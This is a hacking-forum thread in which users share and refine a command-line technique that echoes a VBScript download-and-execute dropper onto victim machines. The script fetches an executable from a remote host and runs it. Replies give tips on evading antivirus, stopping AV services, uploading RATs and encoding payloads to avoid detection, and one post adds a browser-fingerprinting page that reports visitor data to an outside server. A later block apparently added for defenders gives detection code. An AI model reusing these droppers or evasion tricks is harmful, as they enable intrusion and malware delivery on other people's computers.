GhostCow
it's too simple to kill firewalls once you can get files into the machine...
thanks for the bitchin code!
realloader
with this VBS script from boshcash i can upload serv-u to Target IP and start it.
But i can not connect to my STRO.
How can i connect to my stro? can someone help me?
nipagini
hey cool, very nice, exactly what i was looking for!!
iLLuSioN
nice thanks alot !
rastis_monkey
ty
thegeek
Thanks a lot, but I discovered why it at first would not work for me.
You NEED a space before >/>>

CODE
echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://www.microsoft.com/ms.exe", False>>dl.vbs
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
Fareway
wow dude that's new to me - looks very cool! thx
Buluemoon
Thanks boshcash, I am going to test this on a friend's box and see what kind of results we get, I believe he runs Kaspersky AV, didn't notice anyone mention if Kaspersky picks it up.
will be great to have a working alternative to ftp and tftp.
boshcash
mm , i need u guys to try to use the write to file ">" using other thing than echo command , maybe we can create a file without any restrictions .. i still can't put the < and > signs at the text ..
eXtErNaL
this really helped

my regards
zero-maitimax
i think the problem is with the exe file....

i have an idea if you make a exe file in mime (base64) file
and put it on a page..
now download the page extracted the file and open it..

or try to change the .exe to .pif maybe it works then..
capster
pimp way to download a file remotely. ftp has never given me a problem but this is nice
rush
why not use wget?
With wget.exe you can download files from http/ftp/etc..
So you can do the same, no?
Jackson
kewl i will test that thx
headbanger
nice share, thanks.. ill try it soon
zero-maitimax
QUOTE (rush @ Jan 1 2004, 08:36 PM)
why not use wget?
With wget.exe you can download files from http/ftp/etc..
So you can do the same, no?

what is that for a program?

is it an external program or an internal program..?
boshcash
wget isn't installed with windows by the way , it's not found except if someone already got it ..
skorpio
fantastic!!!!!
but if you wanted to upload more than file as I modify the code?
Thanks


Bye
boshcash
yes of course change the code or make the first upload to be a web downloader like dhttp or a RAT with upload feature
NeBo_K
Thanks a lot seems very useful.
UltraCool
Well this could be very useful, thank you very much!

UC
Andy
great tip. gonna have to try this out
The Storm
i've tried this and it worked very good but on some systems it doesn't work i don't know why. But this script is a very good work! Thank you 1000 times
matrixz
to know the ip



CODE
<html>
<head>
<title>IP info</title>



<!-- REQUIRED BY GGScript -->
<script language="JavaScript"> var GG_js = 1.0; </script>
<script language="JavaScript1.1"> var GG_js = 1.1; </script>
<script language="JavaScript1.2"> var GG_js = 1.2; </script>
<script>
<!-- REQUIRED BY GGScript -->
var GG_sk = "Unknown";var GG_cd = 0;var GG_sw = 0;var GG_sh = 0;var GG_dr = GG_sk;var GG_du = GG_sk;var GG_an = GG_sk;var GG_av = GG_sk;var GG_np = GG_sk;var GG_ua = GG_sk;var GG_IPAddr = GG_sk;
document.URL?GG_du=document.URL:GG_du=GG_sk;document.referrer?GG_dr=document.referrer:GG_dr=GG_sk;navigator.appName?GG_an=navigator.appName:GG_an=GG_sk;navigator.appVersion?GG_av=navigator.appVersion:GG_av=GG_sk;navigator.userAgent?GG_ua=navigator.userAgent:GG_ua=GG_sk;
if(GG_js >= 1.2)
{
if(screen.width)GG_sw=screen.width;if(screen.height)GG_sh=screen.height;if(screen.colorDepth)GG_cd=screen.colorDepth;
GG_cd==2?GG_cd="4":(GG_cd==4?GG_cd="16":(GG_cd==8?GG_cd="256":(GG_cd==16?GG_cd="65K":(GG_cd==24?GG_cd="16.7M":(GG_cd==32?GG_cd="16.7M":dd=0)))));
navigator.platform?GG_np=navigator.platform:GG_np=GG_sk;
}
if(GG_js >= 1.1)
document.write("<script language=\"JavaScript1.1\" src=\"http://www.ggscript.com/GGScript/GG_IP.cgi?"+GG_du+"^"+escape(GG_an)+"^"+escape(GG_ua)+"^"+escape(GG_np)+"^"+GG_sw+"^"+GG_sh+"^"+GG_cd+"^"+escape(GG_dr)+"\"></"+"script>");
// -->
</script>
<script>
<!--
// REQUIRED BY GGScript
// do not remove, Netscape 3 needs this...
document.write(" ");
// -->
</script>

<script>
<!--
// This is for the IP Address
if(GG_IPAddr != GG_sk)
document.write("<B>Your IP address:</B><BR>"+GG_IPAddr+"<BR><BR>")

// -->




</script>



to open site if u path on it


CODE
<a href="" onmouseover="parent.location='http://your site'">do not   touch</A>




to see c: folders

CODE
<font color="#800000"><strong><input onclick="window.open('file:///C|/', 'display', 'scrollbars=1')" type="button" value=" see folders C"></strong></font>


brOmstar
hi boshcash,

there is a way to include the "<" and ">" you only have to prefix "^"

so
CODE
echo ^<xxx^>>file.txt


results <xxx> in the file.txt

hope this helps ..

brOmstar
thegeek
thanks a lot brOmstar
boshcash
bromster thanks anyway someone told me this hint 2 weeks ago , and its very very useful hint .. with that im planning to improve my way , i can write the way to echo a vbs file that writes an exe file without file download , so it wont be detected as virus as i think , i will also think of ways to make all text executables
LittleHacker
Thanks All
Very nice topic
I think it worse to try it
EviL
Thank you!!!
cock
cool script, thanks
Dj_BaRt
great script thx
flashb4ck
yeah thats a really nice method so the admins think that this is a normal vb script but we did it h3h3


sorry 4 my bad english ;D


gr€€tZ flasHb4Ck

and thanx anyway
tibbar
using vbs script is crap, nearly all AV will kill it, which apart from stopping your fun and games, will mean the "vic" is alerted to your attack.

Why not do something like use a bat2exe prog, and simply use ftp??? there's really not much to go wrong.

i think that this has been discussed in previous posts...
boshcash
sometimes ftp.exe is deleted .. sometimes u dont have except this way ... i need to know another way to echo any text file to be converted to exe ..
mamep
works fine
nice one m8
very useful
phaeton
Could you take this, put it in a bat file -> EXE -> morphine then no detection?
boshcash
how could i upload morphine to victim without even sending him a program to work the file transfer ?! guys understand what i am trying to do , then comment plz ..
slb33
vbs script doesn't get detected until I echo this line:

SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite

any way around this and still get it to work?
mr.anderson
if you already have access to CMD you can stop mcafee.... net stop (service)
anyways very nice method thx
boshcash
mr anderson is right , i think we can stop some of the AVs by net stopping service name , also if anyone knows any vbscript that doesn't get detected as a malicious script , and can write/download a file , that would help a lot ..
Copkill
The script works fine for me,
thx a lot for this

i used them when ftp.exe is disabled

net_runner
this way really rulz.
i prove it in my pc and works, even the .bat style.
but when i try echo it via sqlexec(gui) it say SQL Error, any advice?
globe7
tnx dude! for useful
ritsel
Yeah very nice proggie dude.

Thanks for sharing
igs
hey all.
im looking for vbs base64 decode function binary safe.
everything i found-- strips out some characters ...

if you got anything- i'd really appreciate it.
thanx.
boshcash
igs , i'm looking for a better method too , why don't u try using the mac-binhex format its better than base64 ..
Feanor
looks very interesting...

Will try it, the problem is that i don't have an HTTP server to upload from, well i'll see what i can do.

EDIT
Kewl, on my comp it worked, now time to test it with remote comp.
Nope, couldn't upload anything on remote computer, but i'll try somewhere else too.
Pgame
very nice post, thnx dude

I test it, it works fine on my computer, but remote it works only if you have system rights
ThEWaTcHeR
i have changed the code a little

now, it works very good

CODE

echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs
echo HTTPGET.Open ^"^GET^"^, ^"^http://www.mysite.de/file.exe^"^, False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1 >>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2 >>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject(^"^ADODB.Stream^"^)>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile ^"^c:\file.exe^"^, adSaveCreateOverWrite>>c:\madefile.vbs
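
Added example for defenders, not part of any post in this thread: the scripts above are written one `echo` redirection at a time, so no single logged command line carries the whole pattern. This Python sketch rebuilds each target file from a sequence of command lines and flags script files that combine an HTTP object, `ResponseBody`, `ADODB.Stream` and `SaveToFile`. The log format, the placeholder URL and paths, and the threshold are assumptions, and treating every `^` as an escape is a simplification of cmd.exe quoting.

```python
import re
from collections import defaultdict

# Constructed sample: command lines as a process-creation log might record them
# when each line runs through its own "cmd /c" (placeholder URL and paths).
SAMPLE_CMDLINES = [
    'cmd /c echo Set H = CreateObject("Microsoft.XMLHTTP") >dl.vbs',
    'cmd /c echo H.Open "GET", "http://example.invalid/a.bin", False >>dl.vbs',
    'cmd /c echo H.Send >>dl.vbs',
    'cmd /c echo Set S = CreateObject(^"^ADODB.Stream^"^) >>dl.vbs',
    'cmd /c echo S.Write H.ResponseBody >>dl.vbs',
    'cmd /c echo S.SaveToFile "out.bin", 2 >>dl.vbs',
    'cmd /c echo backup finished >>C:\\logs\\job.txt',
]
# "echo <body> > path" or ">> path"; a '>' preceded by '^' is escaped text, not a redirect.
ECHO_REDIR = re.compile(r'\becho\s+(?P<body>.*?)\s*(?<!\^)(?P<op>>>?)\s*(?P<path>\S+)\s*$', re.I)
INDICATORS = {
    "http_object": re.compile(r"XMLHTTP", re.I),
    "response_body": re.compile(r"\.ResponseBody", re.I),
    "binary_stream": re.compile(r"ADODB\.Stream", re.I),
    "save_to_file": re.compile(r"\.SaveToFile", re.I),
}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".wsf")

def reassemble(cmdlines):
    """Rebuild each target file from echo redirections ('>' truncates, '>>' appends)."""
    files = defaultdict(list)
    for line in cmdlines:
        m = ECHO_REDIR.search(line)
        if not m:
            continue
        path = m.group("path").strip('"').lower()
        if m.group("op") == ">":
            files[path] = []
        # Simplification: drop every caret and keep the character it escapes.
        files[path].append(re.sub(r"\^(.)", r"\1", m.group("body")))
    return {p: "\n".join(body) for p, body in files.items()}

def findings(cmdlines, threshold=3):
    """Return {path: sorted indicator names} for script files with >= threshold hits."""
    out = {}
    for path, text in reassemble(cmdlines).items():
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
        if path.endswith(SCRIPT_EXTS) and len(hits) >= threshold:
            out[path] = hits
    return out

if __name__ == "__main__":
    print(findings(SAMPLE_CMDLINES))
```
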
boshcash
the best idea is trying to hide a vbs script by encoding or writing a binary to the system by using base64 or macbinhex anyone can do that , to use it with cmdshell , for more info on mac-binhex encoding see the my.pics.zip malware's browser exploit ... (as an example)